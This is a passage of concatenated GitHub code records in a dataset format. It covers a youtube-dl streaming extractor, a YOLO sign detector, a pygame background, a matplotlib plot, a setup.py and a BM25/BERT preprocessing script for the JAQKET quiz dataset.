+ self._REALM,\n 'x-api-key': self._API_KEY,\n }\n\n email, password = self._get_login_info()\n if email is None:\n self.raise_login_required()\n\n p_headers = self._HEADERS.copy()\n p_headers['Content-Type'] = 'application/json'\n self._HEADERS['Authorization'] = 'Bearer ' + self._download_json(\n self._API_BASE + 'login',\n None, 'Logging in', data=json.dumps({\n 'id': email,\n 'secret': password,\n }).encode(), headers=p_headers)['authorisationToken']\n\n def _call_api(self, path, media_id):\n return self._download_json(\n self._API_BASE + path + media_id, media_id, headers=self._HEADERS)\n\n def _extract_dve_api_url(self, media_id, media_type):\n stream_path = 'stream'\n if media_type == 'video':\n stream_path += '/vod/'\n else:\n stream_path += '?eventId='\n try:\n return self._call_api(\n stream_path, media_id)['playerUrlCallback']\n except ExtractorError as e:\n if isinstance(e.cause, compat_HTTPError) and e.cause.code == 403:\n raise ExtractorError(\n self._parse_json(e.cause.read().decode(), media_id)['messages'][0],\n expected=True)\n raise\n\n def _real_extract(self, url):\n domain, media_type, media_id, playlist_id = re.match(self._VALID_URL, url).groups()\n\n if playlist_id:\n if self._downloader.params.get('noplaylist'):\n self.to_screen('Downloading just video %s because of --no-playlist' % media_id)\n else:\n self.to_screen('Downloading playlist %s - add --no-playlist to just download video' % playlist_id)\n media_type, media_id = 'playlist', playlist_id\n\n if media_type == 'playlist':\n playlist = self._call_api('vod/playlist/', media_id)\n entries = []\n for video in try_get(playlist, lambda x: x['videos']['vods']) or []:\n video_id = str_or_none(video.get('id'))\n if not video_id:\n continue\n entries.append(self.url_result(\n 'https://%s/video/%s' % (domain, video_id),\n self.ie_key(), video_id))\n return self.playlist_result(\n entries, media_id, playlist.get('title'),\n playlist.get('description'))\n\n dve_api_url = self._extract_dve_api_url(media_id, media_type)\n video_data = self._download_json(dve_api_url, media_id)\n is_live = media_type == 'live'\n if is_live:\n title = self._live_title(self._call_api('event/', media_id)['title'])\n else:\n title = video_data['name']\n\n formats = []\n for proto in ('hls', 'dash'):\n media_url = video_data.get(proto + 'Url') or try_get(video_data, lambda x: x[proto]['url'])\n if not media_url:\n continue\n if proto == 'hls':\n m3u8_formats = self._extract_m3u8_formats(\n media_url, media_id, 'mp4', 'm3u8' if is_live else 'm3u8_native',\n m3u8_id='hls', fatal=False, headers=self._MANIFEST_HEADERS)\n for f in m3u8_formats:\n f.setdefault('http_headers', {}).update(self._MANIFEST_HEADERS)\n formats.append(f)\n else:\n formats.extend(self._extract_mpd_formats(\n media_url, media_id, mpd_id='dash', fatal=False,\n headers=self._MANIFEST_HEADERS))\n self._sort_formats(formats)\n\n subtitles = {}\n for subtitle in video_data.get('subtitles', []):\n subtitle_url = subtitle.get('url')\n if not subtitle_url:\n continue\n subtitles.setdefault(subtitle.get('lang', 'en_US'), []).append({\n 'url': subtitle_url,\n })\n\n return {\n 'id': media_id,\n 'title': title,\n 'formats': formats,\n 'thumbnail': video_data.get('thumbnailUrl'),\n 'description': video_data.get('description'),\n 'duration': int_or_none(video_data.get('duration')),\n 'tags': video_data.get('tags'),\n 'is_live': is_live,\n 'subtitles': subtitles,\n 
}\n","repo_name":"ytdl-org/youtube-dl","sub_path":"youtube_dl/extractor/imggaming.py","file_name":"imggaming.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":124682,"dataset":"github-code","pt":"95"} +{"seq_id":"26719180824","text":"from abc import ABC, abstractmethod\nimport os\nimport cv2\nfrom typing import List\nfrom dataclasses import dataclass, asdict\nimport logging\nimport numpy as np\nfrom .contour import Contour\nfrom ultralytics import YOLO\nfrom cap_from_youtube import cap_from_youtube\n\n\n\n@dataclass\nclass DetectorPrediction:\n predicted_contour: Contour\n contour_probability: float\n contour_class: int\n\n dict = asdict\n names = {\n 0: 'blue_border',\n 1: 'blue_rect',\n 2: 'danger',\n 3: 'main_road',\n 4: 'mandatory',\n 5: 'prohibitory'\n }\n\n colores = {\n 0: (255, 0, 0),\n 1: (255, 122, 0),\n 2: (0, 255, 0),\n 3: (0, 255, 122),\n 4: (0, 0, 255),\n 5: (122, 0, 255)\n }\n\n def dict(self):\n return {\n \"contour\": self.predicted_contour.xyxy,\n \"probability\": self.contour_probability,\n \"class\": self.names[int(self.contour_class)],\n \"color\": self.colores[int(self.contour_class)],\n }\n\n\nclass Detector(ABC):\n\n @abstractmethod\n def __init__(self):\n pass\n\n @abstractmethod\n def detect_contours(self, image: np.ndarray) -> List[DetectorPrediction]:\n \"\"\"\n Return boxes of all detected contours from image.\n :param image: np.ndarray RGB image\n :return: List[Contour]\n \"\"\"\n pass\n\n\nclass DummyDetector(Detector):\n\n def __init__(self, detection_model_path: str):\n logging.info('Loading Detector')\n self.model_path = detection_model_path\n\n def detect_contours(self, image: np.ndarray) -> List[DetectorPrediction]:\n dummy_contour = Contour(bounding_rect=(0, 0, 50, 50))\n prediction = DetectorPrediction(predicted_contour=dummy_contour, contour_probability=0.98)\n return [prediction]\n\n\nclass YoloDetector(DummyDetector):\n\n def __init__(self, detection_model_path: str):\n super().__init__(detection_model_path)\n self._load_model()\n\n def _load_model(self):\n self.model = YOLO(self.model_path)\n\n def detect_contours(self, img) -> [DetectorPrediction]:\n predictions = []\n results = self.model(img)\n for result in results[0].boxes.data:\n\n contour = Contour(bounding_rect=(result[0], result[1], result[2], result[3]))\n prediction = DetectorPrediction(contour, float(result[4]), int(result[-1]))\n predictions.append(prediction)\n\n return predictions\n\n def detect_contours_video(self, vid_url: str, save=True):\n video_id = vid_url.split(\"/\")[-2] + \"_\" + vid_url.split(\"/\")[-1]\n frames_dir = f\"media/frames/{video_id}\"\n video_dir = \"media/videos/\"\n os.makedirs(frames_dir,exist_ok=True)\n cap = cap_from_youtube(vid_url, resolution='720p')\n start_time = 5\n cap.set(cv2.CAP_PROP_POS_FRAMES, start_time * cap.get(cv2.CAP_PROP_FPS))\n count = 0\n height, width = 0, 0\n res = []\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n height, width, layers = frame.shape\n preds = self.detect_contours(frame)\n if preds != []:\n res.append(preds)\n for pred in preds:\n data = pred.dict()\n cv2.rectangle(frame, (int(pred.predicted_contour.x_min), int(pred.predicted_contour.y_min)),\n (int(pred.predicted_contour.x_max), int(pred.predicted_contour.y_max)), data[\"color\"], 2)\n\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", frame)\n count += 1\n\n if save:\n video = cv2.VideoWriter(video_id+\".avi\", 0, 1, (width, height))\n images = [img for img in os.listdir(frames_dir) if 
img.endswith(\".jpg\")]\n for image in images:\n video.write(cv2.imread(os.path.join(frames_dir, image)))\n\n cv2.destroyAllWindows()\n video.release()\n\n return res, video_dir + video_id\n\n def save_predictions(self, img_path: str, path: str):\n predictions = self.model(img_path)\n return predictions.save(filepath=path)\n","repo_name":"MulhamShaheen/DL-team-6","sub_path":"inference_api/infrustructure/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72924601594","text":"import math\nimport pygame\nimport random\nimport events\nfrom random import randrange\nfrom utils import background\n\n#Edicion: 1\n#Por: Ariel\n\n#Sera el fondo de la presentacion y probablemente tambien del menu\n\nclass Point:\n x,y = 0,0\n angle = 0\n speed = 5\n LOOPS = 0\n STOPPER = 40\n def __init__(self,position,angle,speed):\n self.x,self.y = position\n self.angle = angle\n self.speed = speed\n \n def logic_update(self,EVENTS):\n if (self.LOOPS == 0):\n self.x += math.sin(math.radians(self.angle)) * self.speed\n self.y += math.cos(math.radians(self.angle)) * self.speed\n \n self.x += math.sin(math.radians(self.angle)) * self.speed\n self.y += math.cos(math.radians(self.angle)) * self.speed\n \n if (self.LOOPS % self.STOPPER == 0 and self.speed > 1):\n self.speed += 1\n if (self.STOPPER > 1):\n self.STOPPER = self.STOPPER / 2\n \n self.LOOPS += 1\n \n \n def graphic_update(self,SCREEN):\n pygame.draw.circle(SCREEN,(255,255,255),(int(self.x),int(self.y)),1)\nclass Background:\n POINTS = []\n LOOPS = 0\n PERIOD = 1\n __COLOR= background.cBackground()\n def __init__(self):\n \n self.__COLOR.set_min_blue(100)\n self.__COLOR.set_min_red(100)\n self.__COLOR.set_min_green(100)\n self.__COLOR.SetSpeed(3)\n \n def logic_update(self,EVENTS):\n self.__COLOR.update()\n \n for x in range(len(self.POINTS)):\n self.POINTS[x].logic_update(EVENTS)\n if (self.LOOPS % self.PERIOD == 0):\n for y in range(2):\n self.AddPoint()\n self.LOOPS += 1\n \n def graphic_update(self,SCREEN):\n SCREEN.fill(self.__COLOR.GetColor())\n \n for x in range(len(self.POINTS)):\n self.POINTS[x].graphic_update(SCREEN)\n \n def AddPoint(self):\n STAGE_WIDTH,STAGE_HEIGHT = pygame.display.get_surface().get_size()\n point = Point((STAGE_WIDTH / 2, STAGE_HEIGHT / 2), random.randrange(360), 5)\n point.logic_update(events.events())\n self.POINTS.append(point)","repo_name":"elgrandt/TuxWorld-3","sub_path":"presentation/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74258896951","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex=True)\nplt.rcParams['font.family']= 'cm'\nplt.rc('text.latex', preamble=r'\\usepackage{amsmath}')\n\nx = y = np.linspace(-1, 1, 20)\nr = np.hypot(x,y)\nX, Y = np.meshgrid(x, y)\n\nu = X/r**3\nv = Y/r**3\n\nfig = plt.figure(figsize=(8,8))\nplt.subplot(111)\nplt.quiver(X, Y, u, v, color='b')\nplt.title(r\"$\\vec{\\bf{v}} = \\dfrac{ \\vec{ \\bf{r} } }{r^2}$ \", y = 1.02, fontsize=15)\n\nplt.tight_layout()\nplt.savefig('Fig3c', dpi=300)\nplt.show()","repo_name":"Shiro951216/Mathematical_Models_of_Physics","sub_path":"Homework1/codes/Graphics/Vector Fields/3c.py","file_name":"3c.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} 
+{"seq_id":"15926720595","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\nimport os\nimport re\n\ntry:\n from setuptools import setup\n has_setuptools = True\nexcept ImportError:\n from distutils.core import setup\n has_setuptools = False\n\nPROJECT_NAME = 'py2xml'\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n### FIND ALL SUB-PACKAGES ###\ndef iter_packages(root):\n ignore = len(os.path.dirname(root)) + 1\n for path, _, files in os.walk(root):\n if '__init__.py' in files:\n yield '.'.join(path[ignore:].split(os.path.sep))\nPACKAGES = list(iter_packages(os.path.join(ROOT_DIR, PROJECT_NAME)))\n\n\n### METADATA ###\ntry:\n with open(os.path.join(ROOT_DIR, PROJECT_NAME, '__init__.py')) as f:\n VERSION = re.search(\"__version__ = '([^']+)'\", f.read()).group(1)\nexcept IOError:\n with open(os.path.join(ROOT_DIR, PROJECT_NAME + '.py')) as f:\n VERSION = re.search(\"__version__ = '([^']+)'\", f.read()).group(1)\n\nwith open(os.path.join(ROOT_DIR, 'README.md')) as f:\n README = f.read()\n\nwith open(os.path.join(ROOT_DIR, 'LICENSE')) as f:\n LICENSE = f.read()\n\nmetadata = {\n 'name': PROJECT_NAME,\n 'version': VERSION,\n 'description': \"Magic declarative XML building tool.\",\n 'long_description': README,\n 'author': 'Philipp Rasch',\n 'author_email': 'ph.r@hotmail.de',\n #'url': '',\n #'download_url': '',\n 'platforms': 'any',\n 'license': LICENSE,\n 'packages': PACKAGES,\n 'classifiers': ('Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.5'\n )\n}\n\n# setuptools only arguments\nif has_setuptools:\n metadata.update({\n #'tests_require': ['pytest>=2.6.1']\n})\n\n\nif __name__ == '__main__':\n setup(**metadata)\n","repo_name":"DaRasch/py2xml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15002398804","text":"import json\nimport argparse\nimport glob\nimport logging\nimport os\nimport random\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nfrom typing import List\nfrom io import open\nimport gzip\n\nfrom transformers import (\n WEIGHTS_NAME,\n BertConfig,\n BertForMultipleChoice,\n BertJapaneseTokenizer,\n PreTrainedTokenizer,\n)\n\nimport math\nimport MeCab\nfrom collections import Counter, defaultdict\nimport pickle\nimport time\nimport unidic\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ntagger = MeCab.Tagger('-d \"{}\"'.format(unidic.DICDIR))\nSTOP_POSTAGS = ('BOS/EOS',\"代名詞\",\"接続詞\",\"感動詞\",\"動詞,非自立可能\",\"助動詞\",'助詞',\"接頭辞\",\"記号,一般\",\"補助記号\",\"空白\")\nSEPARATE_TOKEN = '。'\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for multiple choice\"\"\"\n\n def __init__(self, example_id, question, contexts, endings,ctx1,ctx2,ctx3,label=None):\n \"\"\"Constructs a InputExample.\n Args:\n example_id: Unique id for the example.\n contexts: list of str. The untokenized text of the first sequence\n (context of corresponding question).\n question: string. The untokenized text of the second sequence\n (question).\n endings: list of str. multiple choice's options.\n Its length must be equal to contexts' length.\n label: (Optional) string. The label of the example. 
This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.example_id = example_id\n self.question = question\n self.contexts = contexts\n self.endings = endings\n self.label = label\n self.ctx1 = ctx1\n self.ctx2 = ctx2\n self.ctx3 = ctx3\n\n\nclass InputFeatures(object):\n def __init__(self, example_id, choices_features1,choices_features2,choices_features3,choices_features4, label):\n self.example_id = example_id\n self.choices_features1 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features1\n ]\n self.choices_features2 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features2\n ]\n self.choices_features3 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features3\n ]\n self.choices_features4 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features4\n ]\n self.label = label\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for multiple choice data sets.\"\"\"\n\n def get_examples(self, mode, data_dir, fname, entities_fname):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n \n \nclass JaqketProcessor(DataProcessor):\n\n def _get_entities(self, data_dir, entities_fname):\n logger.info(\"LOOKING AT {} entities\".format(data_dir))\n entities = dict()\n for line in self._read_json_gzip(os.path.join(data_dir, entities_fname)):\n entity = json.loads(line.strip())\n entities[entity[\"title\"]] = entity[\"text\"]\n\n return entities\n\n def get_examples(self, mode, data_dir, json_data, entities, num_options=20):\n \"\"\"See base class.\"\"\"\n logger.info(\"LOOKING AT {} [{}]\".format(data_dir, mode))\n entities = entities\n return self._create_examples(\n json_data,\n mode,\n entities,\n num_options,\n )\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\n \"0\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n \"15\",\n \"16\",\n \"17\",\n \"18\",\n \"19\",\n ]\n\n def _read_json(self, input_file):\n return input_file\n# with open(input_file, \"r\", encoding=\"utf-8\") as fin:\n# lines = fin.readlines()\n# return lines\n\n def _read_json_gzip(self, input_file):\n with gzip.open(input_file, \"rt\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n return lines\n\n def _create_examples(self, lines, t_type, entities, num_options):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n\n examples = []\n skip_examples = 0\n\n # for line in tqdm.tqdm(\n # lines, desc=\"read jaqket data\", ascii=True, ncols=80\n # ):\n logger.info(\"read jaqket data: {}\".format(len(lines)))\n for line in lines:\n data_raw = line\n\n id = data_raw[\"qid\"]\n question = data_raw[\"question\"].replace(\"_\", \"\") # \"_\" は cloze question\n options = data_raw[\"answer_candidates\"][:num_options] # TODO\n answer = data_raw[\"answer_entity\"]\n ctx1 = data_raw[\"ctx1\"]\n ctx2 = data_raw[\"ctx2\"]\n ctx3 = data_raw[\"ctx3\"]\n\n if answer not in options:\n continue\n\n 
if len(options) != num_options:\n skip_examples += 1\n continue\n\n contexts = [entities[options[i]] for i in range(num_options)]\n truth = str(options.index(answer))\n\n if len(options) == num_options: # TODO\n examples.append(\n InputExample(\n example_id=id,\n question=question,\n contexts=contexts,\n endings=options,\n ctx1=ctx1,\n ctx2=ctx2,\n ctx3=ctx3,\n label=truth,\n )\n )\n\n if t_type == \"train\":\n assert len(examples) > 1\n assert examples[0].label is not None\n\n logger.info(\"len examples: {}\".format(len(examples)))\n logger.info(\"skip examples: {}\".format(skip_examples))\n\n return examples\n \ndef convert_examples_to_features(example):\n# tokenizer: PreTrainedTokenizer,)\n \n \n label_list = [f\"{i}\" for i in range(20)]\n label_map = {label: i for i, label in enumerate(label_list)}\n pad_token_segment_id=0\n pad_on_left=False\n pad_token=0\n mask_padding_with_zero=True\n max_length = 768\n \n contexts,endings,question,label,example_id,ctx_add1,ctx_add2,ctx_add3 = example\n \n ##top1_ignore-answer\n entity_text1 = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add1[:1]])\n ##top5_in-answer\n entity_text2 = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add2[:5]])\n \n features = []\n context2_1 = get_contexts_bm25(entity_text1,question)\n context2_3 = get_contexts_bm25(entity_text2,question)\n ##正解エンティティの本文 + 正解候補のタイトルを除外したBM25で引っ張ってきた文章(top1)\n choices_features1 = []\n ##選択肢本文のみ\n choices_features2 = []\n ##BM25で引っ張ってきた文章のみ(top5)\n choices_features3 = []\n ##BM25で引っ張ってきた文章のみ(top5)(wikiを検索するときも並び替えの時もqueryに選択肢を追加)\n choices_features4 = []\n for ending_idx, (context, ending) in enumerate(\n zip(contexts,endings)\n ):\n input_ids, attention_mask, token_type_ids = make_bert_input1(ending,question,context2_1,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features1.append((input_ids, attention_mask, token_type_ids))\n input_ids, attention_mask, token_type_ids = make_bert_input2(ending,question,context2_1,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features2.append((input_ids, attention_mask, token_type_ids))\n input_ids, attention_mask, token_type_ids = make_bert_input3(ending,question,context2_3,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features3.append((input_ids, attention_mask, token_type_ids))\n \n \n entity_text = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add3[ending_idx][:5]])\n context2_4 = get_contexts_bm25_add_answer(entity_text,question,ending)\n input_ids, attention_mask, token_type_ids = make_bert_input3(ending,question,context2_4,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features4.append((input_ids, attention_mask, token_type_ids))\n\n\n label = label_map[label]\n\n features.append(\n InputFeatures(\n example_id=example_id,\n choices_features1=choices_features1,\n choices_features2=choices_features2,\n choices_features3=choices_features3,\n choices_features4=choices_features4,\n label=label,\n )\n )\n\n return features\n\ndef make_bert_input1(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n context1 = get_contexts_bm25(entities[ending],question)\n text_a = context1[:768]+ tokenizer.sep_token + context2\n text_b = question + tokenizer.sep_token + ending\n\n inputs = tokenizer.encode_plus(\n text_a,\n text_b,\n add_special_tokens=True,\n max_length=max_length,\n truncation=\"only_first\", # 
always truncate the context\n    )\n\n    input_ids, token_type_ids = (\n        inputs[\"input_ids\"],\n        inputs[\"token_type_ids\"],\n    )\n\n    # The mask has 1 for real tokens and 0 for padding tokens. Only\n    # real tokens are attended to.\n    attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n    # Zero-pad up to the sequence length.\n    padding_length = max_length - len(input_ids)\n    if pad_on_left:\n        input_ids = ([pad_token] * padding_length) + input_ids\n        attention_mask = (\n            [0 if mask_padding_with_zero else 1] * padding_length\n        ) + attention_mask\n        token_type_ids = (\n            [pad_token_segment_id] * padding_length\n        ) + token_type_ids\n    else:\n        input_ids = input_ids + ([pad_token] * padding_length)\n        attention_mask = attention_mask + (\n            [0 if mask_padding_with_zero else 1] * padding_length\n        )\n        token_type_ids = token_type_ids + (\n            [pad_token_segment_id] * padding_length\n        )\n    return input_ids, attention_mask, token_type_ids\n\ndef make_bert_input2(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n    context1 = get_contexts_bm25(entities[ending],question)\n    text_a = context1\n    text_b = question + tokenizer.sep_token + ending\n\n    inputs = tokenizer.encode_plus(\n        text_a,\n        text_b,\n        add_special_tokens=True,\n        max_length=max_length,\n        truncation=\"only_first\", # always truncate the context\n    )\n\n    input_ids, token_type_ids = (\n        inputs[\"input_ids\"],\n        inputs[\"token_type_ids\"],\n    )\n\n    # The mask has 1 for real tokens and 0 for padding tokens. Only\n    # real tokens are attended to.\n    attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n    # Zero-pad up to the sequence length.\n    padding_length = max_length - len(input_ids)\n    if pad_on_left:\n        input_ids = ([pad_token] * padding_length) + input_ids\n        attention_mask = (\n            [0 if mask_padding_with_zero else 1] * padding_length\n        ) + attention_mask\n        token_type_ids = (\n            [pad_token_segment_id] * padding_length\n        ) + token_type_ids\n    else:\n        input_ids = input_ids + ([pad_token] * padding_length)\n        attention_mask = attention_mask + (\n            [0 if mask_padding_with_zero else 1] * padding_length\n        )\n        token_type_ids = token_type_ids + (\n            [pad_token_segment_id] * padding_length\n        )\n    return input_ids, attention_mask, token_type_ids\n\ndef make_bert_input3(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n    context1 = context2\n    text_a = context1\n    text_b = question + tokenizer.sep_token + ending\n\n    inputs = tokenizer.encode_plus(\n        text_a,\n        text_b,\n        add_special_tokens=True,\n        max_length=max_length,\n        truncation=\"only_first\", # always truncate the context\n    )\n\n    input_ids, token_type_ids = (\n        inputs[\"input_ids\"],\n        inputs[\"token_type_ids\"],\n    )\n\n    # The mask has 1 for real tokens and 0 for padding tokens. 
Only\n # real tokens are attended to.\n attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n attention_mask = (\n [0 if mask_padding_with_zero else 1] * padding_length\n ) + attention_mask\n token_type_ids = (\n [pad_token_segment_id] * padding_length\n ) + token_type_ids\n else:\n input_ids = input_ids + ([pad_token] * padding_length)\n attention_mask = attention_mask + (\n [0 if mask_padding_with_zero else 1] * padding_length\n )\n token_type_ids = token_type_ids + (\n [pad_token_segment_id] * padding_length\n )\n return input_ids, attention_mask, token_type_ids\n\n\ndef get_qus_answers(input_file):\n with open(input_file, \"r\", encoding=\"utf-8\") as fin:\n lines = fin.readlines() \n queries = []\n answers = []\n for line in tqdm(lines):\n data_raw = json.loads(line.strip(\"\\n\"))\n question = data_raw[\"question\"].replace(\"_\", \"\") # \"_\" は cloze question\n answer = data_raw['answer_candidates']\n queries += [(question,answer)]\n# answers += [answer]\n return queries\n\ndef read_json(x):\n with open(x, \"r\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n lines = [eval(line) for line in lines] \n return lines\n\ndef get_contexts_bm25(sentence_list,query,topk=1000):\n sentence_list = sentence_list.split(\"。\")\n inverted_index = defaultdict(list)\n sentence_id2sentence = [sentence for sentence in sentence_list]\n sentence_id2token_count = []\n for sentence_id, sentence in enumerate(sentence_list):\n tokens = parse_text(sentence)\n \n sentence_id2token_count += [len(tokens)]\n\n count_tokens = Counter(tokens)\n for token, count in count_tokens.items():\n inverted_index[token] += [(sentence_id, count)]\n\n avgdl = sum(sentence_id2token_count) / len(sentence_id2token_count)\n parsed_query = parse_text(query)\n target_posting = {}\n for token in parsed_query:\n if token in inverted_index:\n postings_list = inverted_index[token]\n target_posting[token] = postings_list\n\n # bm25スコアでor検索\n k1 = 2.0\n b = 0.75\n all_docs = len(sentence_list)\n sentence_id2tfidf = [0 for i in range(all_docs)]\n for token, postings_list in target_posting.items():\n idf = math.log2((all_docs-len(postings_list)+0.5) / (len(postings_list) + 0.5))\n # idfが負になる単語は一般的すぎるので無視\n idf = max(idf, 0)\n if idf == 0:\n continue\n for sentence_id, tf in postings_list:\n dl = sentence_id2token_count[sentence_id]\n token_tfidf = idf * ((tf * (k1 + 1))/(tf + k1 * (1-b+b*(dl/avgdl))))\n sentence_id2tfidf[sentence_id] += token_tfidf\n\n sentences = [(sentence_id, tfidf) for sentence_id, tfidf in enumerate(sentence_id2tfidf) if tfidf != 0]\n sentences = sorted(sentences, key=lambda x: x[1], reverse=True)\n return \"。\".join(list(map(lambda x: sentence_id2sentence[x[0]], sentences[:topk])))\n\ndef get_contexts_bm25_add_answer(sentence_list,query,answer,topk=1000):\n sentence_list = sentence_list.split(\"。\")\n inverted_index = defaultdict(list)\n sentence_id2sentence = [sentence for sentence in sentence_list]\n sentence_id2token_count = []\n for sentence_id, sentence in enumerate(sentence_list):\n tokens = parse_text(sentence)\n \n sentence_id2token_count += [len(tokens)]\n\n count_tokens = Counter(tokens)\n for token, count in count_tokens.items():\n inverted_index[token] += [(sentence_id, count)]\n\n avgdl = sum(sentence_id2token_count) / len(sentence_id2token_count)\n parsed_query = parse_text(query)\n parsed_query += 
parse_text(answer)\n target_posting = {}\n for token in parsed_query:\n if token in inverted_index:\n postings_list = inverted_index[token]\n target_posting[token] = postings_list\n\n # bm25スコアでor検索\n k1 = 2.0\n b = 0.75\n all_docs = len(sentence_list)\n sentence_id2tfidf = [0 for i in range(all_docs)]\n for token, postings_list in target_posting.items():\n idf = math.log2((all_docs-len(postings_list)+0.5) / (len(postings_list) + 0.5))\n # idfが負になる単語は一般的すぎるので無視\n idf = max(idf, 0)\n if idf == 0:\n continue\n for sentence_id, tf in postings_list:\n dl = sentence_id2token_count[sentence_id]\n token_tfidf = idf * ((tf * (k1 + 1))/(tf + k1 * (1-b+b*(dl/avgdl))))\n sentence_id2tfidf[sentence_id] += token_tfidf\n\n sentences = [(sentence_id, tfidf) for sentence_id, tfidf in enumerate(sentence_id2tfidf) if tfidf != 0]\n sentences = sorted(sentences, key=lambda x: x[1], reverse=True)\n return \"。\".join(list(map(lambda x: sentence_id2sentence[x[0]], sentences[:topk])))\n\ndef parse_text(text):\n node = tagger.parseToNode(text)\n tokens = []\n while node:\n if node.feature.startswith(STOP_POSTAGS):\n pass\n else:\n feature = node.feature.split(\",\")\n if len(feature) >7:\n tokens += [feature[7].lower()]\n else:\n tokens += [node.surface.lower()]\n node = node.next\n return tokens\n\n\ndef select_field1(features, field):\n return [\n [choice[field] for choice in feature.choices_features1] for feature in features\n ]\n\ndef select_field2(features, field):\n return [\n [choice[field] for choice in feature.choices_features2] for feature in features\n ]\n\ndef select_field3(features, field):\n return [\n [choice[field] for choice in feature.choices_features3] for feature in features\n ]\n\ndef select_field4(features, field):\n return [\n [choice[field] for choice in feature.choices_features4] for feature in features\n ]\n\ndef get_batch(features):\n all_input_ids1 = torch.tensor(select_field1(features, \"input_ids\"), dtype=torch.long)\n all_input_mask1 = torch.tensor(select_field1(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids1 = torch.tensor(select_field1(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids1 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids2 = torch.tensor(select_field2(features, \"input_ids\"), dtype=torch.long)\n all_input_mask2 = torch.tensor(select_field2(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids2 = torch.tensor(select_field2(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids2 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids3 = torch.tensor(select_field3(features, \"input_ids\"), dtype=torch.long)\n all_input_mask3 = torch.tensor(select_field3(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids3 = torch.tensor(select_field3(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids3 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids4 = torch.tensor(select_field4(features, \"input_ids\"), dtype=torch.long)\n all_input_mask4 = torch.tensor(select_field4(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids4 = torch.tensor(select_field4(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids4 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n inputs1 = (all_input_ids1,all_input_mask1,all_segment_ids1,all_label_ids1)\n inputs2 = (all_input_ids2,all_input_mask2,all_segment_ids2,all_label_ids2)\n inputs3 = (all_input_ids3,all_input_mask3,all_segment_ids3,all_label_ids3)\n inputs4 = 
